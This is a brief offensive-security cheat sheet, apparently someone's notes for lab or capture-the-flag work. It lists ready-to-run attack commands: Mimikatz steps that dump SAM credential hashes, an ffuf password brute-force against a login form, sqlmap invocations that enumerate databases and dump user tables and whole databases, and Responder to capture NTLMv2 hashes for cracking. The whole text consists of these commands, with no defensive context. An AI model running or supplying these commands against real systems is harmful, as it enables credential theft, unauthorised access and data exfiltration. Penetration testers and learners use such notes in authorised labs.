Mimikatz
# Must be ran as admin
privilege::debug
token::elevate
lsadump::sam
FFUF
# Brute Force Username/Password
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.10/customers/login -fc 200
Sqlmap
# Basic scan
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
# Dump data
sqlmap -u $URL --level=4 --risk=3 --dump
# Using a request file
sqlmap -r request.txt
# Enumerate DBs
sqlmap -r request.txt --dbs
# Enumerate tables
sqlmap -r request.txt -D <db> --tables
# Dump users
sqlmap -r request.txt -D <db> -T users --dump
# Dump all
sqlmap -r request.txt --dump-all
Responder
sudo responder -I tun0
# Wait for hash, try to crack: 5600 NTMLv2